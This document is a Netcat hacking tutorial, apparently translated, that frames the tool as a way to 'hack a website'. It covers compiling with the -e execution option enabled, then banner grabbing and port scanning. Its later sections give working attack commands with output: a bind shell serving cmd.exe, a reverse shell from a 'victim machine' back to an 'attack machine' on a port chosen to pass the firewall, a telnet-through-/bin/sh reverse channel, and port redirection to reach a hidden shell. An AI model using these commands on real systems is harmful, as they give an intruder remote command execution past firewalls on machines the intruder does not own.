1. Introduction
Netcat is an indispensable tool if you want to hack a website, so you need to know a bit about Netcat ;)
2. Compile
Netcat for Linux must be compiled before use.
- Edit the file netcat.c with vi: vi netcat.c
  + Find the line res_init(); in main() and comment it out by putting two slashes in front of it: // res_init();
  + Add the following two lines to the #define section (at the top of the file):
        #define GAPING_SECURITY_HOLE
        #define TELNET
- Compile: make linux
- Test: ./nc -h
- If you want to run Netcat as nc instead of ./nc, add "." to the PATH environment variable in the file ~/.bashrc:
        PATH=/sbin:/usr/sbin:...:.
  (A "." entry in PATH makes the shell run whatever nc happens to sit in the current directory; copying the binary to a directory such as /usr/local/bin avoids that.)
Netcat for Windows does not need to be compiled because the binary nc.exe is provided. Just unpack and run it.
3. The options of Netcat
Netcat runs in command-line mode. Run nc -h to see the parameters:

    C:\> nc -h
    connect to somewhere:   nc [-options] hostname port[s] [ports] ...
    listen for inbound:     nc -l -p port [options] [hostname] [port]
    options:
            -d              detach from console, stealth mode
            -e prog         inbound program to exec [dangerous!!]
            -g gateway      source-routing hop point[s], up to 8
            -G num          source-routing pointer: 4, 8, 12, ...
            -h              this cruft
            -i secs         delay interval for lines sent, ports scanned
            -l              listen mode, for inbound connects
            -L              listen harder, re-listen on socket close
            -n              numeric-only IP addresses, no DNS
            -o file         hex dump of traffic
            -p port         local port number
            -r              randomize local and remote ports
            -s addr         local source address
            -t              answer TELNET negotiation
            -u              UDP mode
            -v              verbose [use twice to be more verbose]
            -w secs         timeout for connects and final net reads
            -z              zero-I/O mode [used for scanning]
    port numbers can be individual or ranges: m-n [inclusive]

- Client mode: nc [-options] hostname port[s] [ports] ...
- Listening mode: nc -l -p port [-options] [hostname] [port]
Some options:
- -d: detach Netcat from the command prompt or console; Netcat then runs in stealth mode (it does not appear in the Taskbar).
- -e prog: execute the program prog; commonly used in listening mode.
- -h: show the help text.
- -i secs: delay of secs between each line of data sent (and between ports scanned).
- -l: put Netcat into listening mode to wait for an inbound connection.
- -L: force Netcat to "listen harder": it listens again after a connection is closed.
- -n: use numeric IP addresses only, such as 192.168.16.7; Netcat will not query DNS.
- -o file: write a hex dump of the traffic to file.
- -p port: specify the local port.
- -r: let Netcat choose random ports.
- -s addr: use addr as the source IP address (source address spoofing).
- -t: do not send extra information in a telnet session. When you telnet to a telnet daemon (telnetd), telnetd usually asks your telnet client for additional information such as the TERM and USER environment variables. If you telnet with Netcat and the -t option, Netcat does not send this information to telnetd.
- -u: UDP mode (by default Netcat uses TCP).
- -v: display detailed information about the current connection; -vv displays even more detail.
- -w secs: set a timeout of secs for each connection (connects and final net reads).
- -z: zero-I/O mode, usually used for port scanning.
Netcat supports port ranges with the syntax port1-port2. For example, 1-8080 means 1, 2, 3, ..., 8080.
4. Examples:
4.1 Capture banner of web server
For example, connect with nc to 172.16.84.2, port 80:

    C:\> nc 172.16.84.2 80
    HEAD / HTTP/1.0
    (press Enter twice here)

    HTTP/1.1 200 OK
    Date: Sat, 05 Feb 2000 20:51:37 GMT
    Server: Apache-AdvancedExtranetServer/1.3.19 (Linux-Mandrake/3mdk) mod_ssl/2.8.2 OpenSSL/0.9.6 PHP/4.0.4pl1
    Connection: close
    Content-Type: text/html

The same with -vv against 172.16.84.1:

    C:\> nc -vv 172.16.84.1 80
    172.16.84.1: inverse host lookup failed: h_errno 11004: NO_DATA
    (UNKNOWN) [172.16.84.1] 80 (?) open
    HEAD / HTTP/1.0

    HTTP/1.1 200 OK
    Date: Fri, 04 Feb 2000 14:46:43 GMT
    Server: Apache/1.3.20 (Win32)
    Last-Modified: Thu, 03 Feb 2000 20:54:02 GMT
    ETag: "0-cec-3899eaea"
    Accept-Ranges: bytes
    Content-Length: 3308
    Connection: close
    Content-Type: text/html
    sent 17, rcvd 245: NOTSOCK
With -o you can log a hex dump of the whole exchange to a file:

    C:\> nc -vv -o nhat_ki.log 172.16.84.1 80

The file nhat_ki.log then contains:

    < 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1 200 OK.
    < 00000010 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 34 20 46 # .Date: Fri, 04 F
    < 00000020 65 62 20 32 30 30 30 20 31 34 3a 35 30 3a 35 34 # eb 2000 14:50:54
    < 00000030 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 #  GMT..Server: Ap
    < 00000040 61 63 68 65 2f 31 2e 33 2e 32 30 20 28 57 69 6e # ache/1.3.20 (Win
    < 00000050 33 32 29 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 # 32)..Last-Modifi
    < 00000060 65 64 3a 20 54 68 75 2c 20 30 33 20 46 65 62 20 # ed: Thu, 03 Feb
    < 00000070 32 30 30 30 20 32 30 3a 35 34 3a 30 32 20 47 4d # 2000 20:54:02 GM
    < 00000080 54 0d 0a 45 54 61 67 3a 20 22 30 2d 63 65 63 2d # T..ETag: "0-cec-
    < 00000090 33 38 39 39 65 61 65 61 22 0d 0a 41 63 63 65 70 # 3899eaea"..Accep
    < 000000a0 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d # t-Ranges: bytes.
    < 000000b0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a # .Content-Length:
    < 000000c0 20 33 33 30 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f #  3308..Connectio
    < 000000d0 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e # n: close..Conten
    < 000000e0 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d # t-Type: text/htm
    < 000000f0 6c 0d 0a 0d 0a                                  # l....

Lines starting with < are data received from the server; lines starting with > are data that Netcat sent to the server.
4.2 Port scanning
- Run Netcat with the -z option. For faster port scanning add -n, so that Netcat does not need DNS. For example, scanning TCP ports 1 to 500 of the host 172.16.106.1:

    [dt@vicki /]# nc 172.16.106.1 1-500
    (UNKNOWN) [172.16.106.1] 443 (?) open
    (UNKNOWN) [172.16.106.1] 139 (?) open
    (UNKNOWN) [172.16.106.1] 111 (?) open
    (UNKNOWN) [172.16.106.1] 80 (?) open
    (UNKNOWN) [172.16.106.1] 23 (?) open

    [dt@vicki /]# nc -nvv -z 172.16.106.1 1-500
    (UNKNOWN) [172.16.106.1] 1025 (?) open
    (UNKNOWN) [172.16.106.1] 1024 (?) open
    (UNKNOWN) [172.16.106.1] 138 (?) open
    (UNKNOWN) [172.16.106.1] 137 (?) open
    (UNKNOWN) [172.16.106.1] 123 (?) open
    (UNKNOWN) [172.16.106.1] 111 (?) open
- Listening shell: on the E:\ machine (172.16.84.2), Netcat listens on port 8080 and hands the connection to cmd.exe:

    E:\> nc -nvv -l -p 8080 -e cmd.exe
    listening on [any] 8080 ...
    connect to [172.16.84.2] from (UNKNOWN) [172.16.84.1] 3159
    sent 0, rcvd 0: NOTSOCK

  From the C:\ machine, connecting to that port gives a command prompt on E:\:

    C:\> nc -nvv 172.16.84.2 8080
    (UNKNOWN) [172.16.84.2] 8080 (?) open
    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-1999 Microsoft Corp.

    E:\> cd test
    cd test
    E:\test> dir /w
    dir /w
     Volume in drive E has no label.
     Volume Serial Number is B465-452F

     Directory of E:\test

    [.]          [..]         NET.EXE      head.log     NetView.exe
    ntcrash.zip  password.txt pwdump.exe
                   6 File(s)        262,499 bytes
                   2 Dir(s)     191,488,000 bytes free

    E:\test> exit
    exit
    sent 20, rcvd 450: NOTSOCK
- Check with netstat -a which ports are already listening:

    netstat -a
    ...
    TCP    nan_nhan:domain    nan_nhan:0    LISTENING    <- port 53 is listening
    ...

  Then make Netcat listen on port 53 with -L, bound to the source address 172.16.84.1:

    E:\> nc -nvv -L -e cmd.exe -s 172.16.84.1 -p 53    <- listen on port 53
    listening on [172.16.84.1] 53 ...
    connect to [172.16.84.1] from (UNKNOWN) [...] 3163
5. Advanced techniques
5.1 Telnet
- Use telnet to connect to a Netcat listening window, then issue commands from that window. This is reverse telnet: the commands travel through one telnet connection and the results are sent back through a second one to the other window. For example:
- On the attack machine (172.16.84.1), open two Netcat windows, listening on ports 80 and 25 respectively:
  + Netcat window (1):

    C:\> nc -nvv -l -p 80
    [...]
    connect to [172.16.84.1] from (UNKNOWN) [...] 1055
    pwd
    ls -la

  + Netcat window (2):

    C:\> nc -nvv -l -p 25
    listening on [any] 25 ...
    connect to [172.16.84.1] from (UNKNOWN) [...] 1056
    total 171
    drwxr-xr-x  17 root root   4096 Feb  5 16:15 .
    drwxr-xr-x  17 root root   4096 Feb  5 16:15 ..
    drwxr-xr-x   2 root root   4096 Feb  5 08:55 bin
    drwxr-xr-x   3 root root   4096 Feb  5 14:19 boot
    drwxr-xr-x  13 root root 106496 Feb  5 14:18 dev
    drwxr-xr-x  37 root root   4096 Feb  5 14:23 etc
    drwxr-xr-x   6 root root   4096 Feb  5 08:58 home
    drwxr-xr-x   6 root root   4096 Feb  5 08:50 lib
    drwxr-xr-x   2 root root   7168 Dec 31  1969 mnt
    drwxr-xr-x   4 root root   4096 Feb  5 16:18 nc
    drwxr-xr-x   2 root root   4096 Aug 23 12:03 opt
    dr-xr-xr-x  61 root root      0 Feb  5 09:18 proc
    drwx------  12 root root   4096 Feb  5 16:24 root
    drwxr-xr-x   2 root root   4096 Feb  5 08:55 sbin
    drwxrwxrwt   9 root root   4096 Feb  5 16:25 tmp
    drwxr-xr-x  13 root root   4096 Feb  5 08:42 usr
    drwxr-xr-x  18 root root   4096 Feb  5 08:52 var

- On the victim machine (nan_nhan), chain two telnet sessions through /bin/sh:

    [root@nan_nhan /]# telnet 172.16.84.1 80 | /bin/sh | telnet 172.16.84.1 25
    /bin/sh: Trying: command not found
    /bin/sh: Connected: command not found
    /bin/sh: Escape: command not found
    Trying 172.16.84.1...
    Connected to 172.16.84.1.
    Escape character is '^]'.
5.2 Creating a reverse channel
This works like reverse telnet. On the attack machine, set Netcat listening on port 80, a port that will not be blocked by the firewall:

    C:\> nc -nvv -l -p 80
    [...]

On the victim machine, connect back to the attack machine and hand the connection to cmd.exe:

    E:\> nc -e cmd.exe 172.16.84.1 80

The listening window on the attack machine then receives the command prompt:

    C:\> nc -nvv -l -p 80
    listening on [any] 80 ...
    connect to [172.16.84.1] from (UNKNOWN) [...] 1035
    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-1999 Microsoft Corp.

    E:\>
5.3 Port redirection
You can use tunnel.pl or fpipe.exe. Consider the following example:
- Run Netcat listening on any port:

    E:\> nc -nvv -L -p 1234 -e cmd.exe
    listening on [any] 1234 ...

- Redirect port 53 to port 1234 with tunnel.pl:

    C:\> perl tunnel.pl --port=53 --tohost=127.0.0.1 --toport=1234

  or with fpipe:

    C:\> fpipe -l 53 -r 1234 127.0.0.1